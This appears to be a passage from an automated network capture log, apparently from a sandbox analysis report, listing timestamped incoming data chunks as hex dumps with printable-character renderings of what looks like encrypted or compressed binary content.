                                                                                                                                                            2022-09-29 12:44:59 UTC5819INData Raw: bc 8f 78 56 9a 6a ca b2 4b 06 d4 34 00 1e fc a3 b2 70 d7 ff c6 09 eb 06 f0 57 b9 18 c6 2b 45 4a c2 e6 37 ab bc 63 82 3c 2b b1 ae 0b 53 23 c2 b5 a8 35 a2 4c 0f d5 d5 ee bf 7e a0 57 b1 9a d2 09 fe eb 4d b2 8b cb 21 64 b7 ff c5 23 67 0d c5 b0 c1 81 b4 51 d5 e7 e4 10 76 e1 ab 90 da ea 27 0e 90 ee e5 77 93 75 5e 13 52 87 8d 47 40 5d a1 9b 93 b7 d2 89 3c 61 3f cf 4e 64 05 c3 ea 87 bd a2 1f e7 ef 06 ce a1 a2 44 5b 13 9a e5 fe 0b b4 a7 2e ec 5e 2d 29 6e a9 32 e1 71 bb 6d 6c 6b 53 fc cf 3c 2f 1a 37 cc ba 51 a0 31 bb d8 a5 08 b5 98 0a 75 be 5c f3 cc 74 37 c3 5d ab 60 1d 8d 1b c8 63 59 0c f7 95 c5 e5 cb ac 36 07 8f 9b b2 15 d7 b7 8e 43 46 68 7b e4 f4 a1 fc 13 37 81 58 52 2b 46 22 27 d1 e5 a3 82 1c 3b 53 d3 d8 19 a7 33 92 f0 07 e2 a6 7c 47 fb 69 01 1d f2 cd 12 1c 44
                                                                                                                                                            Data Ascii: xVjK4pW+EJ7c<+S#5L~WM!d#gQv'wu^RG@]<a?NdD[.^-)n2qmlkS</7Q1u\t7]`cY6CFh{7XR+F"';S3|GiD
                                                                                                                                                            2022-09-29 12:44:59 UTC5835INData Raw: 79 41 17 a0 4d 14 4d bf b6 56 4c 9b 77 cf 1d bf 5c 4d a4 8a dd c8 82 11 91 34 55 f5 fb a4 c2 b2 51 00 66 ee 70 fb 98 44 f9 af 8f 67 6f 9c 22 f6 e3 ae ec d6 5c 5b 43 28 d9 13 d2 83 c4 1c 30 80 0d b0 c5 c3 29 19 47 1f d1 83 f6 18 0a 78 12 89 5f 60 d2 93 d0 f2 a0 46 cf 53 8c 55 10 45 d3 c2 54 1d d5 77 ab 5b f6 ee f2 8a 4c fc 6a 4a 71 ba 20 ad 8a 28 16 63 c5 c7 db 2a 8a a8 69 7b 97 77 98 66 99 1b 61 8c 14 86 a6 c2 4b 41 eb df ef 0e aa 39 2f a5 c3 87 86 ee 5a 53 7d b9 c6 16 9d 5f d3 62 51 fe ef 50 3f 8f 2e ac 5b bb 43 8e 1c 3b 98 96 fe 7a ec 37 d9 6d 83 65 54 6e d2 cf 05 be a7 05 ba cf 2f 93 f5 be b1 49 9a 1d ee d4 d5 39 d3 95 f1 99 17 fd a5 ba da d4 49 bf eb 0a b3 18 a3 28 20 a0 12 b0 af 2a 69 a7 54 92 fc 9d aa 22 6a ca a2 f5 96 d6 2b a5 43 6d 89 d3 0f 6b 25
                                                                                                                                                            Data Ascii: yAMMVLw\M4UQfpDgo"\[C(0)Gx_`FSUETw[LjJq (c*i{wfaKA9/ZS}_bQP?.[C;z7meTn/I9I( *iT"j+Cmk%
                                                                                                                                                            2022-09-29 12:44:59 UTC5851INData Raw: 7b 83 d6 fc 5a 8f d1 4c 96 cc c1 84 94 26 ef cf 23 79 b0 87 17 3f d4 e4 fa b0 ac 59 0d bd fc 35 58 51 87 ce 2b 05 8d 6e ae 8f 0a 88 c0 2f 40 96 14 65 ea 65 19 f4 b0 31 21 0a ea eb 97 e8 d0 b7 47 c8 ea c8 85 85 ee a8 06 2d bc 1e 28 57 d8 34 6e 74 b3 e3 67 d4 45 2b 1a 98 1f d9 1a b6 c1 2b 37 48 69 a3 16 65 56 be a3 3a 01 f9 fd 3d a8 44 18 1b 5f 96 3b b8 9f 75 9b 40 60 76 1d 83 a0 d1 ac e7 88 76 73 ce 35 68 25 6f 35 44 d7 dc 9b 4f c2 dc c4 2f 82 a2 b5 d5 e0 97 17 9f 82 c3 83 73 18 de db 2a a9 22 d0 77 26 58 1a 86 fd 7a 98 f4 55 70 e5 74 c0 e4 7f 89 04 9f 46 ef 17 eb 45 2c 18 1e 80 8f 41 2f 36 e0 dc e2 44 35 05 c8 7f c2 e4 4e 65 30 5c 7f 25 97 5f 45 2e 7a de 35 26 4b 7c 86 8d 74 87 f4 e7 b1 c0 c0 9b b9 2a 1e d5 75 34 d2 7f 0f c7 46 d3 d6 bd 29 34 38 28 33 96
                                                                                                                                                            Data Ascii: {ZL&#y?Y5XQ+n/@ee1!G-(W4ntgE++7HieV:=D_;u@`vvs5h%o5DO/s*"w&XzUptFE,A/6D5Ne0\%_E.z5&K|t*u4F)48(3
                                                                                                                                                            2022-09-29 12:44:59 UTC5867INData Raw: 48 02 29 f4 6d ff b7 6a 03 5a ba da 23 6c 5f aa 5f 38 ae ae 7a e4 bc c8 bd 38 f3 11 d7 5b 4a bc 87 23 74 ed 9d 9a 66 15 03 45 46 68 cd 40 43 6b d4 82 ac 5b 85 44 87 92 69 81 24 4c 8e 99 59 70 89 be 8f dd ff 70 18 e6 b9 92 8c 32 8d ef 9a 70 d8 04 01 4b fb 80 9e 32 cb 7c 77 10 5c cb ae 6c a6 9f 7e b2 62 11 7b b8 b1 7f 58 ce f0 d7 6c 27 db 8b 7a 54 11 d1 e0 5d af 59 7e 81 eb b3 21 25 c6 40 4d 0c 56 ca 6b b5 03 43 f9 af 9e b9 5e b4 57 9d 46 44 c6 81 1b ce 87 96 de 2e 7d 04 fe 16 c1 19 18 40 ce 17 82 32 e4 a3 26 e5 3c f5 bf b6 07 8b be c3 41 4a 64 f8 07 57 1b 20 3d 46 4f d1 77 3d 06 29 d2 7c b4 2c 14 8e c8 c8 d4 1d 4b fa 3e 34 95 92 08 fe 3c 74 e4 c9 e0 c2 58 bb ed 79 3f 11 29 96 3e 47 ce a3 27 fa 68 9b 3b cc 85 92 e3 6f 85 2c af 6a 9e c2 9d be 0e ab 1c a3 67
                                                                                                                                                            Data Ascii: H)mjZ#l__8z8[J#tfEFh@Ck[Di$LYpp2pK2|w\l~b{Xl'zT]Y~!%@MVkC^WFD.}@2&<AJdW =FOw=)|,K>4<tXy?)>G'h;o,jg
                                                                                                                                                            2022-09-29 12:44:59 UTC5883INData Raw: a3 c3 76 78 a1 64 2d 22 f4 11 29 6d db 77 78 19 1f 52 7d e2 39 63 f2 d0 7c c3 d4 c0 c4 ab 9d 5e c7 7f 21 d5 39 60 89 cf e6 43 ac c0 d6 e2 5b ae 35 51 cc 61 01 8f 53 b8 fa 40 fe c9 32 87 0a 56 09 64 f4 05 4d 1e b7 94 96 67 e2 84 6d 8d 0d 6e d4 5a d4 8e 14 97 0b 25 1a c4 0f 84 13 70 28 cd e1 e6 65 dc 85 8d 98 3b 3a 7d 47 0f 33 a3 a3 f8 5f 4b 44 6e 71 1a e7 09 23 77 1b e9 7c 55 c7 8c 10 3f 13 27 95 a8 7f 1a 92 e0 f8 f0 05 c9 99 9b ae 2a 49 f9 df c6 d3 88 c3 07 c6 e8 b1 02 be 71 89 1e 3b 10 6e a9 42 a4 00 ca 31 a4 40 76 8d 55 7a 48 8b 8c 2f ed 0c 86 a3 b4 6b b3 5d 0f 0f 56 02 f8 b6 4e 25 c8 ee a3 42 de f7 44 ec 68 03 9d bb 65 a9 7c 69 f6 53 86 91 6c b2 06 0e 8d de 23 3c 21 a7 dd b7 7d 14 ae 8b 0e 1f 2b 05 3e f1 97 d4 64 66 06 1f c4 49 b8 ee 68 bf 06 07 af 73
                                                                                                                                                            Data Ascii: vxd-")mwxR}9c|^!9`C[5QaS@2VdMgmnZ%p(e;:}G3_KDnq#w|U?'*Iq;nB1@vUzH/k]VN%BDhe|iSl#<!}+>dfIhs
                                                                                                                                                            2022-09-29 12:44:59 UTC5899INData Raw: 19 80 a1 ab 04 2e 42 9a b8 c9 f4 5a 2f 37 de 7b 52 79 6e f9 71 ee 4f 26 cb 56 e5 00 32 6e 6c 78 9d 1b df 2b d6 1c 3a 83 b7 31 a6 8d 57 29 bf 0e f0 ff ea d3 92 3f 8f c3 e8 99 7e a2 44 fb e6 df 8b 2c 8d be c4 da bb 54 65 4a c8 3f 72 95 65 51 df 1c 8f 4e 6d 7a 99 3f 36 7d 5c 65 7e e8 78 62 9c 48 7b c0 6d 69 f4 2a e3 d5 0d d2 9d fc 23 6c bc c3 94 8f a2 9a 05 eb a9 e5 da 21 36 6e 43 4e 9d 51 e0 9b f8 44 4f e5 18 72 d4 58 90 c1 20 db 00 f5 a4 e2 2b 90 5c c1 64 1a 1c c9 bb 9f cb 5e aa f1 6a 68 3c 02 4d 63 93 7d c7 25 a7 87 6d 1d ed b0 02 50 e0 d7 0d b9 8c c2 0a 05 de 58 01 17 6d 98 de 3c 04 5a 02 ce d8 61 e5 7c e5 2d a2 5b f6 6c 08 c0 7e 99 36 05 db 2e fb 30 69 6c 48 ee 4a 94 d0 0b a1 24 ab 7e 07 e4 cc 93 43 02 76 75 7c 62 e6 d8 16 7a 5f 8a 8f 06 8f 34 9a 36 8f
                                                                                                                                                            Data Ascii: .BZ/7{RynqO&V2nlx+:1W)?~D,TeJ?reQNmz?6}\e~xbH{mi*#l!6nCNQDOrX +\d^jh<Mc}%mPXm<Za|-[l~6.0ilHJ$~Cvu|bz_46
                                                                                                                                                            2022-09-29 12:44:59 UTC5909INData Raw: 15 13 43 7e 92 46 a0 18 72 fc 89 5c 41 f0 54 8d 9d 29 de 4c 25 ec 3c 5c d7 23 96 60 01 7a 5b 6f 6d d5 6d 14 85 91 55 38 23 1c 38 c0 a8 d4 b5 a0 0c 74 da 7d 86 fe 91 a2 52 e2 c4 18 48 fc b7 62 46 c4 c7 66 eb dd 47 a8 ab 83 63 bd f5 f0 61 a3 96 c2 bf 35 3b 45 8d b7 09 de e5 ea 2a 00 5c 64 0d ca 4f db 14 f1 c2 93 9f 1c 2c fc 08 7c d1 8a 04 25 02 63 ff d3 21 34 5b 6e d7 06 c5 1f 6e 3d 92 5b 8e 84 3d 79 5f 3f 39 f3 60 ac e9 b8 52 66 7e 1f b2 bd 2c 96 2e 9b 23 1f 3a 2d 59 2f 1f d0 72 ad d0 02 7c fe 44 3d bb e0 86 22 ca d6 62 5c 9a f3 f6 1d 35 1f d1 48 c9 0c cd 77 0f e6 7a 60 c1 f3 50 e1 6a 60 41 55 5d b4 16 8f 48 c5 f5 d5 6e 80 c0 07 56 78 88 fd 15 0a 41 aa 5a b0 fe 27 8e 26 e6 ba 6c cc 88 ab f5 f4 a5 33 41 7e 7a 9f 81 8c 93 d0 7c ca 1e 6c a8 9c 1f f9 d9 de 4b
                                                                                                                                                            Data Ascii: C~Fr\AT)L%<\#`z[ommU8#8t}RHbFfGca5;E*\dO,|%c!4[nn=[=y_?9`Rf~,.#:-Y/r|D="b\5Hwz`Pj`AU]HnVxAZ'&l3A~z|lK
                                                                                                                                                            2022-09-29 12:44:59 UTC5925INData Raw: a4 5f a5 8a f7 89 9b c4 9e a4 68 45 2d d1 41 dd 85 09 8c f1 8e 8a a8 81 95 41 ae e9 ba ef d8 aa c1 cb b6 59 5d 56 06 00 20 64 e1 db d3 f9 d4 db 1b 96 c7 f1 d8 54 65 93 f9 66 f3 f4 7c e1 ae 26 93 12 b5 f6 68 dd fa 6b b5 7e 51 91 86 24 0e d9 89 a4 87 5a 5e fe 22 52 e2 94 f6 2e d1 5c df 98 2d 5c 08 c4 be b9 00 05 ff 49 6c 83 b9 76 15 7a eb 14 04 7b cb 84 3d ec f5 92 b6 65 dc 96 58 f7 11 20 0e 5a f3 aa 0f 9e 86 55 f4 bd b3 e4 c5 d0 85 55 5f e8 44 b7 b4 2b 2e fd 46 be 9b 0e 34 34 46 15 3a 8a a0 a9 ce 25 3f 33 aa 82 99 8d 0f 42 a3 77 8e d8 2e 32 22 41 1b c7 07 33 ff aa 6f 58 87 2b 5f f9 fd e6 5b 7f 8c bc 42 b7 04 ce 77 86 15 ff ec 88 ac df 8f a6 96 9b 9f 6a 8e 6d 40 cf e0 39 36 99 ff cc ed 16 a6 dd b7 f4 30 b7 c9 ed cc de 39 73 16 a6 db 88 4c 2f eb 58 4e ab d8
                                                                                                                                                            Data Ascii: _hE-AAY]V dTef|&hk~Q$Z^"R.\-\Ilvz{=eX ZUU_D+.F44F:%?3Bw.2"A3oX+_[Bwjm@9609sL/XN
                                                                                                                                                            2022-09-29 12:44:59 UTC5941INData Raw: ff cb 3c 7c 47 4f 89 1c d1 73 49 53 e2 ec bc a3 f3 69 bb d9 e9 20 d1 05 44 3a a4 aa 33 69 72 d3 e1 ac d9 52 fa fb 3e 2c 3b d8 a0 5b 42 f8 fd 1c 77 7e d0 3c 52 c5 97 9b 87 db 2d c8 3f 07 07 0a 5a 87 5c ee 03 48 3e f0 b3 3e fc cd 68 f8 18 b8 0b e0 fc 3b 86 3b 45 b8 fe 8e 13 92 a6 1a 48 91 3d 62 75 25 d1 78 cc f3 66 07 1e 2f 50 52 00 c3 e8 c4 5c 9d 31 35 de e9 a9 76 6f 15 b0 39 e3 f6 09 c7 db c8 9e 21 b7 fa d1 9c 0e a6 3d 06 14 f2 84 03 55 40 bc 2f 99 8a f3 77 7d e0 5a b2 98 1f c3 87 a6 87 c6 46 e2 bc 70 06 cf 12 45 31 ae 6f 5e 63 a6 e3 ae 68 c0 22 00 2a b1 3a 7a d7 b4 13 84 e2 2c 28 c9 fd e1 bf ad 17 e5 e2 35 33 0b dd 66 28 6d d9 36 c6 f0 1a 37 3f 14 e1 03 7d 12 88 b4 05 6d 96 71 3e 99 b1 e5 c5 34 b3 b7 0a 60 b7 f3 e3 e4 f6 35 d4 82 df a7 8e 3d a5 0b 7e 2e
                                                                                                                                                            Data Ascii: <|GOsISi D:3irR>,;[Bw~<R-?Z\H>>h;;EH=bu%xf/PR\15vo9!=U@/w}ZFpE1o^ch"*:z,(53f(m67?}mq>4`5=~.
                                                                                                                                                            2022-09-29 12:44:59 UTC5957INData Raw: 44 4d 0d 5e 1a 89 8b d7 1a d0 ce 1e 43 5e 8b fc 44 80 cb 71 36 43 21 b0 a2 86 3d d6 8c 29 bd 98 a2 87 5e 45 be 27 80 25 b7 e8 b1 e6 7e ff 26 0c 74 ab 09 cc 86 91 2b 60 2d 6f 48 55 d4 da f4 f3 1b 2e c3 de a0 fb fa 12 f5 03 2d 40 8c ad 9e a8 5b 07 e4 ed e3 4c 49 ad 4e 12 f5 4b f3 61 a7 55 c6 85 3a 68 7a c5 e6 6f d9 e7 77 ab 54 a2 c3 26 ff 84 10 24 a6 a1 42 42 4c 3e 6d ac e7 a7 d5 3b a7 76 cd 35 da 7c b9 d7 76 c9 5c b8 b2 58 8e b4 95 7d 4d 04 46 ed f4 64 b2 d2 27 d4 f1 dd 2d 0f 79 cf 58 29 6f 25 ad d7 47 25 00 3b 86 f6 ed 0f b0 2f b9 10 36 15 82 37 f3 a0 d6 8f 50 fa 2d f8 83 7c 5b c0 e9 55 46 5b c6 f6 c6 8d f2 4a 6a 6b 43 c1 5a 3b 4b 8f eb 14 91 1d c5 f8 90 00 d9 51 53 f7 e7 7a ba 8d 83 99 8b e9 ff 76 ce be c0 3e 95 0b d8 c9 03 cf 3d bd 96 e2 42 e1 a8 c6 46
                                                                                                                                                            Data Ascii: DM^C^Dq6C!=)^E'%~&t+`-oHU.-@[LINKaU:hzowT&$BBL>m;v5|v\X}MFd'-yX)o%G%;/67P-|[UF[JjkCZ;KQSzv>=BF
                                                                                                                                                            2022-09-29 12:44:59 UTC5973INData Raw: f6 e6 15 39 68 03 bd 8a 9d 04 2c a2 b7 17 6c 29 99 55 3d 68 4a d0 ab 47 4d 2f d7 1c ea e7 db c1 2e 8a 80 d6 f4 f4 4a 19 90 6a 88 db a9 39 6a dd 7b ad 87 19 c2 9a bf 59 5b ba 71 32 ae 5d a3 a3 16 d6 c8 1e 9e 78 46 36 6d dd 2f 97 3f b3 e0 64 08 f7 a5 ba 73 b0 3f 9a 20 73 99 67 4f 3d fc 9b 6f dc fe 14 32 2f ea cf 3c 11 a2 11 2d 4e 49 5e f8 1c 62 71 85 74 35 2e f8 5d aa 4e 0e d8 80 0a 6b a9 75 7a 22 3f b5 a2 7c 48 ca ab 1f e5 20 76 c8 6f 05 ba ae 5b f4 46 d5 d0 60 c0 ad 22 e6 a5 74 cd ef 7d 9d 4f 60 09 6c e9 cc 44 23 cd 65 5e bd 30 22 a3 a1 a1 55 da 55 76 95 95 92 2e 08 1a bf e5 1b a2 eb 10 4b a1 88 8b 48 d9 cd 49 2e 48 df f3 a0 38 db 1d 67 f4 4b 13 ae a0 03 af 99 ca 21 73 52 4f 2c 4a bf 78 30 4b c2 f9 f2 46 b5 25 54 5e 16 1d 9a 4f 76 4b 13 35 76 a4 58 64 7a
                                                                                                                                                            Data Ascii: 9h,l)U=hJGM/.Jj9j{Y[q2]xF6m/?ds? sgO=o2/<-NI^bqt5.]Nkuz"?|H vo[F`"t}O`lD#e^0"UUv.KHI.H8gK!sRO,Jx0KF%T^OvK5vXdz
                                                                                                                                                            2022-09-29 12:44:59 UTC5989INData Raw: e2 46 08 bb fd bb 19 d8 0d 36 f0 99 08 1d 0e f6 61 51 e4 6e 59 fe e1 f6 47 e2 13 d8 fc f1 7d fb 45 24 a8 7e 44 74 75 de 8f 68 cb 0b cc 53 2e dc 93 19 af 07 56 c4 06 77 a0 b4 01 60 7a da ab bc eb f9 38 01 44 5c 8d 39 29 65 32 1b d0 da dc f0 33 1d 3d 9e 8d 13 1e d2 a5 d2 5d 09 08 92 3f 06 a5 fc d4 df 65 e9 19 ed 05 62 c5 65 c0 9a 80 80 1e 2c c9 64 76 7e 63 51 1d e4 61 a9 3a 1c fe 38 b7 40 ca 32 41 0f d2 c4 43 ac ff c8 51 3a 45 54 a6 8c ee c4 5f 47 33 c6 58 6c 44 67 b6 cf 51 ed 83 84 10 b8 2a 7f b8 bb 95 c9 56 59 4d 1d b2 ae 1c af 9f 8d c6 2a 24 de fb a2 0d 88 60 24 e0 8a 5f 51 2c df af 8a e2 2a 2f 80 97 e2 bc 1d 29 3a 0b 1d 0d 37 f0 b9 f1 31 8e 72 2f 10 c5 eb 31 5f b3 3a 92 b5 33 d0 ea 1d 48 91 5d ed 56 e8 16 44 56 52 60 23 21 a1 97 e6 2e dc 76 ad 18 09 e2
                                                                                                                                                            Data Ascii: F6aQnYG}E$~DtuhS.Vw`z8D\9)e23=]?ebe,dv~cQa:8@2ACQ:ET_G3XlDgQ*VYM*$`$_Q,*/):71r/1_:3H]VDVR`#!.v
                                                                                                                                                            2022-09-29 12:44:59 UTC6005INData Raw: 63 3e ea 7c 92 3c c3 d7 b4 0e a2 ac e5 b2 27 1b c1 c1 dd 18 f0 f8 07 e0 e3 36 7c 9e 03 d7 18 5e 97 df 41 ff 43 bc d0 5d ce 80 62 59 20 61 8b 83 74 59 b4 90 e3 88 25 2d 58 a1 0d d5 60 12 14 b1 75 79 85 7d 36 78 cc ef c9 29 16 ff ae 20 c5 a9 10 ed 7c e8 1e ef f9 10 a4 1d 9b 18 3a 42 91 a0 82 e4 d6 a2 c7 de c7 42 a0 7f 86 40 b4 80 37 2d 34 63 11 44 22 c5 5c 24 63 25 da 18 80 90 f8 6d 94 2f a5 d8 71 47 7a 58 a0 5e e1 a5 29 55 51 1f 29 58 93 85 e4 ee 4c f8 a0 3a 6d b9 83 7b ea 5c 3d c0 73 60 2a 36 c4 fd 93 7f 4c 6b 8e fd 79 96 c7 03 b9 14 3a 56 30 85 26 2a 56 e6 00 44 34 91 c9 14 64 2d a3 d7 70 2f 27 f8 17 fc 03 06 d5 ba d5 36 d7 ea 79 40 9c bd c3 15 cb 10 aa 2e fe 12 9d a4 eb cd e4 9c 56 1d 3b e1 aa 88 9e 29 08 74 e8 a4 dd e7 a6 d9 32 bc 90 16 1e 05 3b b9 8e
                                                                                                                                                            Data Ascii: c>|<'6|^AC]bY atY%-X`uy}6x) |:BB@7-4cD"\$c%m/qGzX^)UQ)XL:m{\=s`*6Lky:V0&*VD4d-p/'6y@.V;)t2;
                                                                                                                                                            2022-09-29 12:44:59 UTC6021INData Raw: c7 e1 1d ef d6 d2 3d 5c 74 77 2f 58 25 67 4c 77 fe cc 05 27 83 6a 5e 27 d5 c3 30 f8 62 8a 79 69 58 de dd 8c f8 39 c2 40 7c 0b 81 1c c2 d8 8b 05 92 91 7d 30 b3 20 6f 1b b7 b5 61 ce c7 9a 6e 3c 14 aa a0 cb 68 64 14 b1 19 bc cf eb 3b 00 1f 31 df 98 df be 6c c9 4e bc e1 81 05 60 f8 17 43 21 a7 3c 15 f8 9a 08 f3 df 79 8c 29 d9 19 a0 a7 73 e4 61 07 ca 77 17 6c 10 47 e7 fb 45 7a 07 8c cc 18 ca 31 12 bb fd 62 c6 7d 4f 20 1f 7c 4a f9 18 a7 88 ca d6 e9 8f 32 40 9b c5 95 cd 64 c0 43 a2 4a 9c 66 1e 30 1a 61 e0 55 2f c2 8b 91 68 fc 15 fb ea 34 f0 0b 33 ae 82 4d 79 28 e6 58 9e 2c 34 17 97 49 63 6e 31 4c 10 be ed 8f d2 c4 c8 06 3e 0d 59 0a e2 fb b2 35 7b d3 2e e2 cf 10 b1 a4 c7 46 bd a7 4e 6c e3 a5 b6 5d 78 95 a7 37 01 50 3c f7 0a ab d3 31 5c 16 fc 2b a6 33 0e 1c d6 3f
                                                                                                                                                            Data Ascii: =\tw/X%gLw'j^'0byiX9@|}0 oan<hd;1lN`C!<y)sawlGEz1b}O |J2@dCJf0aU/h43My(X,4Icn1L>Y5{.FNl]x7P<1\+3?
                                                                                                                                                            2022-09-29 12:44:59 UTC6037INData Raw: df 0a d0 09 26 49 4a 28 3c 1f 26 82 63 79 b0 ca 63 bc 58 0b 03 b3 ee 87 26 97 e7 60 ff 6d 5a 46 e5 c5 f2 07 22 e5 25 15 68 6d 08 61 68 97 9d 83 4b d0 2e b5 92 1c 38 d1 53 5f a8 05 45 7e 61 73 fd b1 ae fd 31 6f 0f 96 4a 07 df f2 a4 58 91 85 4a 6a 20 ca 50 04 ff d1 47 13 02 0f 94 7b 5d a6 df 21 2f 2c a9 0b 82 5e 61 fe f0 fe dc 1a c8 3f c7 cf 62 b1 6d e3 79 de 5a 79 bb 7e b9 03 0b 72 5a a0 ad 78 47 39 97 bc 59 4c fb d2 68 b6 16 ed b1 4e 60 e8 df 98 31 c1 91 69 ba 9d ee b5 77 51 06 e4 f6 bf 11 8e 49 7a 67 ea 1c 41 12 fb dd 8a b3 d5 66 b2 76 5c af 73 72 2a 0c b7 3c cd b9 44 6a 4f 8e 64 7e 2f 55 05 45 78 d7 32 13 4c c7 50 05 90 f7 89 03 c9 5e 20 06 50 3e 63 78 78 81 ab 19 6a f0 2e 3c 10 ac 5d af 4c e3 ef 2f cd 20 4b 9a c8 42 51 ce 31 77 e5 96 34 85 e4 93 4e 8b
                                                                                                                                                            Data Ascii: &IJ(<&cycX&`mZF"%hmahK.8S_E~as1oJXJj PG{]!/,^a?bmyZy~rZxG9YLhN`1iwQIzgAfv\sr*<DjOd~/UEx2LP^ P>cxxj.<]L/ KBQ1w4N
                                                                                                                                                            2022-09-29 12:44:59 UTC6053INData Raw: e0 64 dd 38 40 23 3f d6 20 a7 46 9a 99 ae 2c cc 45 cb 50 c7 5b 16 2e 5c 51 ce 71 32 c4 c5 b1 f4 0f 90 67 a6 91 10 30 8a 9f 10 ef fc 99 17 2e 86 c2 40 f3 47 f5 9c fd 79 32 47 48 91 09 e2 f4 1b 2c 5a 83 bb ab 6b b7 9d 07 23 b1 47 90 93 b5 09 89 fe 85 e0 fd 62 6d c5 7a 44 49 2b 49 b0 5a ff 46 67 9b d4 6a 52 37 9d 9e 94 d6 e0 83 d6 58 c4 e8 ca 31 35 2f 46 c4 e8 c5 70 17 45 ae 5e 18 f4 22 87 16 88 02 f5 51 07 e2 e3 5e c9 3a 52 5e 09 ab ab 30 26 a5 ff 6e db c8 4a 59 70 c9 4c 03 3c a5 14 4c d7 c7 19 9a de 33 4c c6 e6 42 71 db 52 a1 86 d5 b7 41 e4 86 f5 88 2c 47 dc 2c 9b 2f ef 00 3b 97 ca 2c 64 43 91 82 3e 99 3e 66 a9 c7 04 99 47 07 10 71 85 6e 09 52 e0 1f fb df 47 a8 98 70 02 0b 8f 5c 57 cc d1 10 f5 f8 c4 5c 70 be 14 37 58 8f 75 95 e9 40 70 ec 1a 84 ee c6 48 be
                                                                                                                                                            Data Ascii: d8@#? F,EP[.\Qq2g0.@Gy2GH,Zk#GbmzDI+IZFgjR7X15/FpE^"Q^:R^0&nJYpL<L3LBqRA,G,/;,dC>>fGqnRGp\W\p7Xu@pH
                                                                                                                                                            2022-09-29 12:44:59 UTC6069INData Raw: c8 f8 d6 85 1a 49 27 56 6f cb 5f 81 78 23 ab 6e a3 7e b1 5f 15 2e 84 28 5c 03 dc 13 60 40 0c 19 84 06 3a 9b d4 82 26 58 48 25 4f 74 e1 01 4b 4f 3d a5 57 b2 91 26 42 53 37 c1 5e c8 79 01 ad 01 a4 ef 70 cc 9f 50 9c a1 a2 2e a5 e8 57 0a 9e 56 b0 84 ba 80 52 f1 5f ce 51 d2 12 aa 96 b8 fc 2f 6d 23 11 e0 f3 3b 27 09 47 0a 0c ee aa cf 51 3a 24 f3 a5 08 03 b7 37 20 58 00 b7 24 df 44 73 33 ec f9 34 81 08 d7 66 24 f4 46 41 55 8a 77 d1 af 7b 8d 82 33 1b 63 76 97 24 9f 30 49 5c eb 4d 15 01 a2 8b 9f cb 99 08 7c 39 d8 29 0b 77 82 66 e9 6d 7c 6f cb 4d 4c 43 31 57 3d a1 18 67 73 b2 d1 0e 1a 2f cd 66 c7 1e 19 b4 a2 7c 42 21 3d 18 52 b6 0d f2 47 c6 66 34 57 cc 3e a5 cc 63 d3 de 03 1e f8 bc a7 78 6d 89 a8 0f a4 68 14 bf e4 19 51 f3 dd b3 22 77 f7 5b 54 0a 79 8f db 16 34 dd
                                                                                                                                                            Data Ascii: I'Vo_x#n~_.(\`@:&XH%OtKO=W&BS7^ypP.WVR_Q/m#;'GQ:$7 X$Ds34f$FAUw{3cv$0I\M|9)wfm|oMLC1W=gs/f|B!=RGf4W>cxmhQ"w[Ty4
                                                                                                                                                            2022-09-29 12:44:59 UTC6085INData Raw: 77 c2 44 f6 4a f7 98 2e 9d 0d f6 4c 2c 18 fd 7d 09 3d ec 65 ee b5 44 d6 f3 6b 89 b0 fb 58 4e ec ca 2c 42 e9 40 e9 61 cd ca d5 5c b2 6e 4c 79 c2 19 d5 d9 aa c4 70 74 e2 c7 84 bc 34 f7 ca 7e d9 bb c4 82 3c fd ff a7 bc 7a 7c b0 84 ba 9f be 60 9e 37 10 79 87 ee 68 b7 91 8b 2a 39 d8 fa b9 a2 9e bb 96 b4 80 7f 8a 2c e2 aa 7f 14 89 f6 7d 43 d2 51 89 c5 b5 d1 91 c0 49 56 bd fe 0f d3 53 bb 5c e2 7a 17 86 1e 97 f7 e6 7d 22 68 32 34 5d e4 fa 9f ce 90 13 15 2a ef c0 e8 c9 09 3f 78 68 3e ad b0 6d 53 f1 ad 15 65 d4 60 49 c3 77 8f fb 52 76 c3 57 d6 27 90 c3 68 78 6f 50 fd be 7b 07 43 24 94 a7 a6 49 7f 93 89 80 5a 4d 9e 8d 38 ac f9 29 26 47 15 cc dd 1f d7 0a 45 9a 29 05 cd 1a 5f a6 d4 09 31 48 ca d0 e4 c8 ab 28 b3 62 f1 78 60 9c 36 4d fe c4 64 d2 8a db 9f 91 1e 06 da ec
                                                                                                                                                            Data Ascii: wDJ.L,}=eDkXN,B@a\nLypt4~<z|`7yh*9,}CQIVS\z}"h24]*?xh>mSe`IwRvW'hxoP{C$IZM8)&GE)_1H(bx`6Md
                                                                                                                                                            2022-09-29 12:44:59 UTC6101INData Raw: 12 21 08 63 ea 6a 0a 49 f2 42 35 3b 90 95 e9 3f aa 4e 21 cb 08 a3 10 cb b3 86 c0 0d 4a 2f f9 50 9e 2b cd 11 62 7d 67 89 37 a8 76 cd 01 5d ab 09 17 6e cf 75 a3 81 6f 7c cc 7d 6d d9 8a 26 b9 3a 8c 74 5e 83 70 b7 79 b2 18 2b ef 98 ce 23 f0 ea 82 c8 9f 59 f3 9a 6a 3f fd 08 11 f4 db 17 99 f8 22 14 a2 f5 f0 99 56 49 3b 8d f5 7a f3 4e b5 83 12 09 d4 a8 9a 28 9e a9 ad a5 35 0d 5a 2f dc ad 88 22 8a 7f 6a 57 c1 c3 9c 0c 25 dd b5 48 8e f4 ad 62 23 73 71 2f db 0e 2d 9a fc 2d 0c 21 b6 2b f8 e2 97 c5 6b 10 90 db 0f 06 39 0a 6b b4 bb c4 50 fe 6e 49 5c 13 e4 dc c6 a3 70 55 cc 23 08 1e 22 b4 d8 9d 6e 70 c5 7f 40 29 52 cb b6 5b 12 0f 9d e3 4d 4a 72 36 60 0d 20 e4 a2 73 3e b2 1d 70 69 7f 59 47 9f b6 1a 2b a4 a0 54 b0 b1 39 93 8b a2 0a c8 0a 36 84 71 d3 c8 34 8b 0e 23 59 3e
                                                                                                                                                            Data Ascii: !cjIB5;?N!J/P+b}g7v]nuo|}m&:t^py+#Yj?"VI;zN(5Z/"jW%Hb#sq/--!+k9kPnI\pU#"np@)R[MJr6` s>piYG+T96q4#Y>
